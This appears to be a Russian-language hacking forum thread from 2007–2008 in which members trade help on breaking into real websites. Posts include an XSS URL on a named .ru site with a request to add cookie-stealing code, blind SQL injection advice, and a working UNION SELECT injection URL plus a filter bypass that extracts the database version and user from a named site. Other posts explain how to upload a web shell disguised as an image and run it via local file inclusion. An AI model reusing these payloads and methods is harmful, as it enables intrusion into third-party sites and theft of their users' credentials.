Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    sedoy_xxx, php, я так понял, там не выполняеца?
     
  2. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    А с синтаксисом точно всё правильно?
     
  3. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    бля. он же пишет
    походу он решил, что если в хтмл код вставить <?php ?>, то он будет выполняться как пхп. что за бред
     
  4. sedoy_xxx

    sedoy_xxx Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    244
    Likes Received:
    41
    Reputations:
    -1
    действительно что то я подзагнался )))) мож у кого еще есть какие-нить варианты???
     
  5. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    sedoy_xxx, имхо ничего нельзя сделать
     
  6. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Файл сохранить с другим расширением не можешь?
     
    1 person likes this.
  7. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    sedoy_xxx iframe/redirect
     
    2 people like this.
  8. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Piflit, он спрашивал как шелл залить, если я не ошибаюсь)
     
    2 people like this.
  9. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    пипл помогите сюда вставить снифер + отсылку кукисов, скоко непробывал невыходит...
    _http://onlinekz.net.ru/engine/modules/imagepreview.php?image=javascript:alert('[XSS]');
    пробывал снифиром http://na-s.ru , логов напостой нету =(
     
  10. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    при скл иньекции когда нету вывода и нету прав на into outfile есть ли ещё способ получить то что там записано?
     
  11. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Doom123
    подзапросы(посимвольный перебор)
     
  12. Naydav

    Naydav Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    439
    Likes Received:
    63
    Reputations:
    4
    delete
     
    #2472 Naydav, 27 Jun 2008
    Last edited: 30 Jun 2008
  13. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    не пойдёт... там же нету вывода на экран результата ... там идёт так...

    1 запрос с этим параметром и 2ой запрос

    в первом запросе яя подобралк количество полей! но во 2ой это количество не подходит и происходит выполнение вункции die(); с ошибкой mysql
     
  14. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Ты представляешь, что такое подзапросы с посимвольным перебором?
    Для них не нужен вывод. Это своего рода true/false.
    Условие верно-страница вылезла,не верно-ошибка
    Твой случай ,если я понял правильно, именно подзапросами и выводится(Да, гиммороя побольше чем с нормальным выводом, но по другому никак)
     
    1 person likes this.
  15. n3m0

    n3m0 Elder - Старейшина

    Joined:
    11 May 2007
    Messages:
    133
    Likes Received:
    92
    Reputations:
    11
    Да.
    Вот, вот этот хостинг http://www.valuehost.ru/
     
  16. Buffalon

    Buffalon Elder - Старейшина

    Joined:
    22 Mar 2008
    Messages:
    241
    Likes Received:
    34
    Reputations:
    8
    http://www.rgufk.ru/modules/sections/index.php?op=viewarticle&artid=148+union+select+1,2,3,4,5,6,7,8,9,10/*
    Вот что с этим можно сделать?ТАм что то фильтруется ... .
     
  17. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Buffalon
    Фильтр слабенький, вот обход:
    http://www.rgufk.ru/modules/sections/index.php?op=viewarticle&artid=148+and+1=2+union+select+1,2,version(),4,5,user(),7,8,9,10
     
  18. Бармалей

    Бармалей New Member

    Joined:
    30 May 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    вопрос.
    есть загрузка файлов/картинок
    при загрузке меняется только название и расширение файла на жпг. содержимое не меняется
    как залить шелл и возможно ли?
     
  19. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Бармалей, если у тебя будет локальный инклуд, то будет и шелл. заливаешь картинку с содержимым шелла, потом инклудишь...
     
  20. Бармалей

    Бармалей New Member

    Joined:
    30 May 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    нету там инклуда(
     
Thread Status:
Not open for further replies.